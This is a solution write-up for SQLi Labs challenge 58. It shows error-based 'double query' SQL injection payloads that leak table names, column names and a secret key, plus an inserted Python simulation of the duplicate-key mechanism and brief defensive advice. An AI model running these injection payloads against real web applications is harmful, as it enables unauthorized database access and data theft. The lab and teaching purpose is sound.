[ Solution ] SQLi Labs : Challenge 58 [ Double Query ] [ GET ]
The 58th challenge is a double-query challenge. But the hardest part is, we get just 5 attempts!
Double query:
When the developer of the web application blocks all kinds of output from the database, there is no escape. No matter what we query, we get no response from the database at all.
Well, but there is a workaround for this too! (Yeah! Of course, hats off to the exploiters!)
Since the database doesn't display or output any message, we need to find an alternative to it.
The only choice we've got is the error message!
We can query the database so as to produce an error, but the error would print what we want! Interesting? Well, let's check out how that works!
Let's try to break the query. A single quote does the job. Now we have to use statements embedded within, so as to get the database to output errors. This error will also carry the results.
Query:
?id=1' union select 1,count(*),concat("~",(select table_name from information_schema.tables where table_schema='challenges' ),"~",floor(rand()*5))a from information_schema.tables group by a --+
The count(*) and group by, together with the concat() key that embeds the inner select and floor(rand()*5), make the database throw a runtime error (a duplicate-key error while grouping). But the query within gets evaluated and its result ends up in the error message:
Here, what got printed out is an error. But we have got the desired output: the table name.
The rest of the steps are the same as in the previous challenges.
Now that we have the table name, we need to find the column names within it.
Query:
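To see why the count(*) / group by / rand() pattern above ends in an error that carries the subquery result, here is an added Python simulation of how MySQL fills the GROUP BY temporary table (example code, not part of the original post or of SQLi Labs). The DuplicateEntryError class and the scripted rand_values are constructed stand-ins for MySQL error 1062 and for the rand() outputs.

```python
import itertools
import random
from typing import Callable, Iterable, Optional


class DuplicateEntryError(Exception):
    """Constructed stand-in for MySQL error 1062: Duplicate entry '...' for key 'group_key'."""


def group_by_count(rows: Iterable, key_expr: Callable[[], str]) -> dict:
    """Simulate how MySQL's GROUP BY fills its temp table keyed on key_expr.

    The group expression is evaluated once to look the group up and again
    when a new group row is inserted.  A deterministic expression yields the
    same value both times; one containing rand() can change between the two
    evaluations, so the insert collides with a group the lookup did not see.
    """
    groups: dict = {}
    for _ in rows:
        key = key_expr()                     # evaluation 1: lookup
        if key in groups:
            groups[key] += 1
            continue
        key = key_expr()                     # evaluation 2: insert
        if key in groups:                    # lookup said "new", insert says "exists"
            raise DuplicateEntryError(f"Duplicate entry '{key}' for key 'group_key'")
        groups[key] = 1
    return groups


def double_query_error(subquery_result: str, rand_values: Iterable[float],
                       rows: int = 20) -> Optional[str]:
    """Run the page's key concat('~', <subquery>, '~', floor(rand()*5)) over `rows` rows.

    rand_values is cycled to supply successive rand() outputs.  Returns the
    error text the database would raise, which embeds subquery_result, or
    None when the grouping happened to succeed (the reason the lab gives
    only a handful of attempts: the leak is probabilistic).
    """
    rand_iter = itertools.cycle(rand_values)
    key = lambda: f"~{subquery_result}~{int(next(rand_iter) * 5)}"
    try:
        group_by_count(range(rows), key)
    except DuplicateEntryError as err:
        return str(err)
    return None


if __name__ == "__main__":
    # Real random draws: usually errors (and leaks), occasionally returns None.
    print(double_query_error("challenge_table", [random.random() for _ in range(40)]))
```

The subquery result reaches the client only because the raw database error is echoed into the page; returning a generic error and using parameterized queries close that channel. On the database side, a 1062 "Duplicate entry ... for key 'group_key'" error whose value is wrapped in delimiters such as ~ is a recognisable trace of this technique in the logs.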
?id=1' union select 1,count(*),concat("~",(select column_name from information_schema.columns where table_name=' THE_RANDOM_TABLE_NAME ' limit 2,1),"~",floor(rand()*5))a from information_schema.tables group by a --+
The limit is 2,1 and not 0,1 because the first column doesn't print anything.
We now know the name of the column where our secret key lies. So, let's go get it!
Query:
?id=1' union select 1,count(*),concat("~",(select SECRET_COLUMN_NAME from ' THE_RANDOM_TABLE_NAME ' ),"~",floor(rand()*5))a from information_schema.tables group by a --+
Submitting this, we get:
Yeah! We have done it within 5 attempts!